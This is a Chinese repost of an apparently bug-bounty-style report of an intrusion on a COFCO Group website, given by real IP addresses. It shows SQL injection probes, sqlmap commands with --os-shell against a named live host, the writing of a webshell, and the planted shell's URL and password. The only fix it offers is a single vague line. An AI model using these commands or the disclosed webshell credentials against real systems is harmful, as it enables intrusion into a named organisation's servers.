欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

一次成功的对中粮集团某网站的fuzz测试大量sql注入加getshell

程序员文章站 2022-03-23 09:22:48
网站没有内容如何拿站呢、幸亏我没有放弃 差点就提交了 又一发test.php引发的血案、审核大哥求 首页 中粮大哥求20 https://wooyun.org/bug...

网站没有内容如何拿站呢、幸亏我没有放弃 差点就提交了 又一发test.php引发的血案、审核大哥求 首页 中粮大哥求20

一次成功的对中粮集团某网站的fuzz测试大量sql注入加getshell



https://wooyun.org/bugs/wooyun-2015-0157025 看到这个test.php 新生感触啊、、于是我又来了

这次直接上御剑
 

一次成功的对中粮集团某网站的fuzz测试大量sql注入加getshell



平常收集的字典果然没让我失望、、 首先找到了一枚xss 不过仅仅是输出 没什么卵用
 

一次成功的对中粮集团某网站的fuzz测试大量sql注入加getshell



接着又找到这个

https://219.143.252.114/left.php

https://219.143.252.114/main.php

https://219.143.252.114/main.php?item=%B5%D8%B2%FA%BE%C6%B5%EA&data_id=2861
 

一次成功的对中粮集团某网站的fuzz测试大量sql注入加getshell



https://219.143.252.114/main.php?item=%BD%F0%C8%DA&data_id=296 and 1=1

https://219.143.252.114/main.php?item=%BD%F0%C8%DA&data_id=296 and 1=2 返回不同 有注入

这就给我来了几分信心 接着 又找到枚注入

C:\Python27\sqlmap>sqlmap.py -u "https://219.143.252.114/mrjx_list.php?month=9"
 

一次成功的对中粮集团某网站的fuzz测试大量sql注入加getshell



mssql dba sa权限 11个数据库 不支持stack_query 所以不能os-shell 顿时伤感的一地

这里提醒一下大家 有的时候不支持stack_query可能是sqlmap的缘故 我上次就遇到过一个 所以再次遇见这样的大家可以换换sqlmap 跑跑试试

当然 我这里没有成功....因为不支持union 所以也没有往读文件上想 因为mysql不支持union是不可以读取文件的、 不过我想想 这是mssql+php 试了下 读不出来 放弃了这条路

对常见端口进行扫描 没准连上1433呢 结果就扫出来一个80端口
 

一次成功的对中粮集团某网站的fuzz测试大量sql注入加getshell

就一个80 愁人 那么这条路好像也断了、心里哇凉哇凉的、、就个sql注入 前面提交都是4rank我也不想提交了、思路又断了

这时候lijiejie的神器又发挥作用了
 

一次成功的对中粮集团某网站的fuzz测试大量sql注入加getshell



看见没 俩个database/
 

一次成功的对中粮集团某网站的fuzz测试大量sql注入加getshell


 

一次成功的对中粮集团某网站的fuzz测试大量sql注入加getshell


嘿嘿 基本可以确定是一套程序 上sqlmap

sqlmap.py -u "https://219.143.252.159/mrjx_list.php?month=9*" --os-shell

这个是2000的数据库 通用是dba sa 权限 不过这个可以执行os-shell 哈哈
 

一次成功的对中粮集团某网站的fuzz测试大量sql注入加getshell



由于前面的报错 路径很容易找到 没有回显 又有点凉、
 

一次成功的对中粮集团某网站的fuzz测试大量sql注入加getshell



写入txt 写入成功哈哈 于是开始写shell
 

一次成功的对中粮集团某网站的fuzz测试大量sql注入加getshell



去网站测试了下 写入成功 哈哈
 

一次成功的对中粮集团某网站的fuzz测试大量sql注入加getshell



拿下shell 到此为止啦

https://219.143.252.159/whynot.php whynot66

一次成功的对中粮集团某网站的fuzz测试大量sql注入加getshell


 

一次成功的对中粮集团某网站的fuzz测试大量sql注入加getshell

 

解决方案:

删除没用的东西 还有俩次运气都很好 哈哈